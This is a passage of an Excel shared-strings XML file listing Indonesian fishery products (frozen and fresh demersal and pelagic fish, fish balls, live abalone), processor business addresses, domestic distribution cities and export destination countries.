    <t>Kp. Kolam, Jl. Sei Enam GG Tarantua, Kel. Sei Enam, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Anggoli, Kerapu, Kakap, Kaci-kaci, Malong)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Mata Besar, Tongkol, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Tugu Wijaya III No.2 Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Cirebon, Kabupaten Banyumas, Kabupaten Kudus, Kabupaten Demak, Kota Surakarta, Kota Semarang, Kota Pekalongan, Kota Tegal, Kota Yogyakarta, Kabupaten Gresik, Kota Surabaya, Kota Denpasar, Kota Mataram</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Tenggiri, Todak, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surakarta</t>
  </si>
  <si>
    <t>China, Japan, Thailand</t>
  </si>
  <si>
    <t>China, Italy, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kerapu, Kakap, Kurisi, Ekor Kuning, Layur)</t>
  </si>
  <si>
    <t>China, France, Japan, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Makerel, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bream, Kerapu, Layur, Kakatua, Bawal, Kakap, Terisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakatua, Bawal, Kakap, Terisi, Cunang, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bonito, Marlin, Selayang, Layaran, Layang, Tenggiri, Selayar)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Marlin, Selayang, Layang, Tenggiri, Selayar)</t>
  </si>
  <si>
    <t>Dusun Palam RT 002 RW 002, Kel. Sawah Baru, Kec. Kampa, Kabupaten Kampar&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Kabupaten Kampar, Kota Pekanbaru</t>
  </si>
  <si>
    <t>Jl. Peltu Syaidan Kp. Deling, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Mie Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Kampar</t>
  </si>
  <si>
    <t>Dusun Kampung Godang RT 001 RW 002, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Jl. Pergudangan Tambak Langon Indah No.27 Blok B-19, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Pergudangan Tiara Jabon Blok B7, Jl. Tambak Sawah, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Chile, China, Philippines, Spain, Viet Nam</t>
  </si>
  <si>
    <t>Korong Simpang, Kel. Kataping, Kec. Batang Anai, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Mini Bag Ikan) </t>
  </si>
  <si>
    <t>Kabupaten Padang Pariaman, Kota Pariaman</t>
  </si>
  <si>
    <t>Kembang Loyang Ikan</t>
  </si>
  <si>
    <t>Jl. Syech Ja'far 07, Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>Komplek PPNP, Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kuniran, Layur, Kaca Piring, Kapas-kapas)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Escolar, Marlin, Meka, Gindara, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Sungai Kampar, Sentra Pengolahan Hasil Perikanan, Kel. Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Patin Bernilai Tambah Beku (Bakso Patin, Nugget Patin)</t>
  </si>
  <si>
    <t>Patin Asin Beku</t>
  </si>
  <si>
    <t>Dusun Krajan RT 02 RW 04, Kel. Srigading, Kec. Lawang, Kabupaten Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Belgium, Chile, China, India, Italy, Philippines, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Swanggi, Kerapu, Layur, Bawal, Sillago, Kakap)</t>
  </si>
  <si>
    <t>Abalon Hidup</t>
  </si>
  <si>
    <t>Dusun Cikoang, Kel. Lakatong, Kec. Mangarabombang, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, Japan, Lao People's Democratic Republic, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Terbang, Kembung, Sarden, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, Japan, Lao People's Democratic Republic, Malaysia, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Semarang, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Semarang, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Selar, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Bawal Hitam, Kerapu Bintik, Sembilang, Sebelah, Senangin)</t>
  </si>
  <si>
    <t>Jl. Tanjung Perak KM 9 No.3, Kel. Sawagumu, Kec. Sorong Utara, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>China, Hong Kong, Singapore</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tude, Tongkol, Cobia, Kembung)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Kuro)</t>
  </si>
  <si>
    <t>Jl. KHM Asyik RT 029 RW 009, Kel. 3-4 Ulu, Kec. Seberang Ulu I, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Sebelah, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>China, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Marlin, Salem, Selar, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Australia, China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Emperor, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Muroaji)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Garut, Kabupaten Cirebon, Kabupaten Subang, Kota Sukabumi, Kota Cirebon</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No. 8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Sri Lanka, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Salem, Muroaji, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Mauritius, Pakistan, Singapore, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Lencam, Kerapu, Layur, Beloso, Bawal, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Sri Lanka, Suriname, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Pakistan, Singapore, Sri Lanka, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Sri Lanka, Suriname, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Lencam, Kerapu, Layur, Beloso, Bawal, Kakap, Kakatua)</t>
  </si>
  <si>
    <t>Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakatua, Laccukang, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Jl. Purwosari RT 005 RW 004, Kel. Tambakrejo, Kec. Gayamsari, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput Laut</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Terbang, Kembung, Sarden, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>American Samoa, Australia, China, Hong Kong, Japan, Korea, Republic of, Malaysia, Mauritius, Mexico, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Terbang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Republic of, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Terbang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakatua, Laccukang, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, Philippines, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kura-kura Hidup</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Dermaga Pelabuhan Perikanan Muara Angke No.01, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kembung, Lemadang)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal, Malong, Lencam, Kerapu)</t>
  </si>
  <si>
    <t>Perum PPSJ Blok O, Kavling 5-6 Room 6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Medan, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Philippines, Spain, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Desa Talise, Kec. Likupang Barat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur, Kel. Mertasinga, Kec. Cilacap Utara, Kabupaten Cilacap&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Jenderal Sudirman RT 002 RW 007, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>China, Hong Kong, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Industri Modern III Kav 12 Kawasan Industri Modern Cikande, Kel. Nambo Ilir, Kec. Kibin, Kabupaten Serang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Kima 7 Kav J-2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban KM 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Malong, Gulama, Kakap, Kurisi, Kerapu)</t>
  </si>
  <si>
    <t>Capit dan Cangkang Rajungan Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Raya Desa Jiken Blok I No.8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Lemuru, Deho, Escolar, Lemadang)</t>
  </si>
  <si>
    <t>Australia, Italy, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Lemuru, Escolar, Lemadang, Meka)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Lencam, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Lencam, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Terasi Udang Basah</t>
  </si>
  <si>
    <t>Kabupaten Lampung Barat, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bogor, Kota Bekasi, Kabupaten Gunung Kidul, Kabupaten Sleman, Kabupaten Sidoarjo, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Banjarmasin, Kota Samarinda</t>
  </si>
  <si>
    <t>Jl. Gatot Kaca No.88, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Layur, Layaran, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Pisang-pisang, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Guntur)</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Mexico, United States</t>
  </si>
  <si>
    <t>Australia, Japan, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Japan, Mexico, United States</t>
  </si>
  <si>
    <t>Australia, Hong Kong</t>
  </si>
  <si>
    <t>Lorong Enok, Kel. Kuala Enok, Kec. Tanah Merah, Kabupaten Indragiri Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Kota Tanjung Balai, Kabupaten Indragiri Hilir</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Salem, Makerel Atlantik)</t>
  </si>
  <si>
    <t>Kabupaten Bangkalan, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Titi Pahlawan No 38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Barakuda, Tongkol, Lemadang, Layang, Tenggiri, Selar Kuning, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Patin, Lele, Jurung, Betutu, Nila)</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Denpasar, Kota Banjarmasin, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Mujair, Patin, Nila)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Bawal, Kod, Manyung, Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Kembung, Lemadang, Gindara, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Lintas Parado, Kel. Naru, Kec. Woha, Kabupaten Bima&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Jl. Raya Gabion Lorong Sawita No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kuring, Selayang, Selar, Aso-aso, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Tapanuli Tengah, Kabupaten Labuhan Batu, Kabupaten Deli Serdang, Kabupaten Langkat, Kota Sibolga, Kota Medan, Kota Binjai, Kota Pekanbaru, Kota Jambi, Kota Palembang</t>
  </si>
  <si>
    <t>Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Bandeng, Patin, Bawal, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Purwakarta</t>
  </si>
  <si>
    <t>Jl. Arif Rahman Hakim RT 16, Kel. Simpang IV Sipin, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Kota Medan, Kota Padang, Kota Bukittinggi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Kendal, Kota Surakarta, Kota Tegal, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Jl. Mawar Indah No.10, Kel. Labuhan Dalam, Kec. Tanjung Senang, Kota Bandar Lampung&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Jl. Kima VI Blok G-4, Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Anggoli, Kerapu, Sukang, Kakatua, Pinjalo, Kakap, Kuro, Lidah, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Cobia, Bonito, Barakuda, Marlin, Kembung, Lemadang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Singapore, Thailand, United States</t>
  </si>
  <si>
    <t>Otoshimi Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pati</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Amberjack, Striped Jack, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Tegal Pemalang Km 11, Kel. Sidaharja, Kec. Suradadi, Kabupaten Tegal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Mata Besar, Mata Goyang)</t>
  </si>
  <si>
    <t>Kabupaten Pekalongan, Kabupaten Tegal, Kabupaten Brebes, Kota Pekalongan, Kota Tegal, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Nusantara Ambon, Jl. Sultan Hasanudin, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Baby Tuna, Deho, Layang, Baronang, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Pontianak</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Desa Dongkala, Kel. Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Kawasan Industri MM2100, Jl. Irian Blok FF No.2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Layang)</t>
  </si>
  <si>
    <t>Tuna Beku (Steak, Saku, Cube)</t>
  </si>
  <si>
    <t>Jl. Pemda Tigaraksa, Gudang Bizpoin Blok E No.38, Kel. Sukamulya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Australia, Canada, Hong Kong, New Zealand, Saudi Arabia, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Australia, Japan, Korea, Democratic People's Republic of, New Zealand, United States</t>
  </si>
  <si>
    <t>Australia, New Zealand, United States</t>
  </si>
  <si>
    <t>Australia, New Zealand, Saudi Arabia</t>
  </si>
  <si>
    <t>Campuran Seafood Snack</t>
  </si>
  <si>
    <t>Australia, Korea, Democratic People's Republic of, New Zealand, United States</t>
  </si>
  <si>
    <t>Dried Cephalopod (Cumi-cumi)</t>
  </si>
  <si>
    <t>Dusun Ombe Rerot, Kel. Ombe Baru, Kec. Kediri, Kabupaten Lombok Barat&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kabupaten Demak, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kabupaten Banyuwangi, Kabupaten Situbondo, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Kabupaten Situbondo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kabupaten Situbondo, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Timur No.3, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpsar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Jordan, Lebanon, Malaysia, Russian Federation, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Meka, Gindara, Tenggiri)</t>
  </si>
  <si>
    <t>Hong Kong, Jordan, Lebanon, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Gindara, Layaran, Salem, Meka)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Sebelah, Kerapu, Layur, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Jenggolo 2/17 Gedung A, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku (Naget Ikan, Naget Udang, Kue Ikan)</t>
  </si>
  <si>
    <t>Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Remang, Layur, Sukang, Bawal, Kakap, Samge, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tenggiri)</t>
  </si>
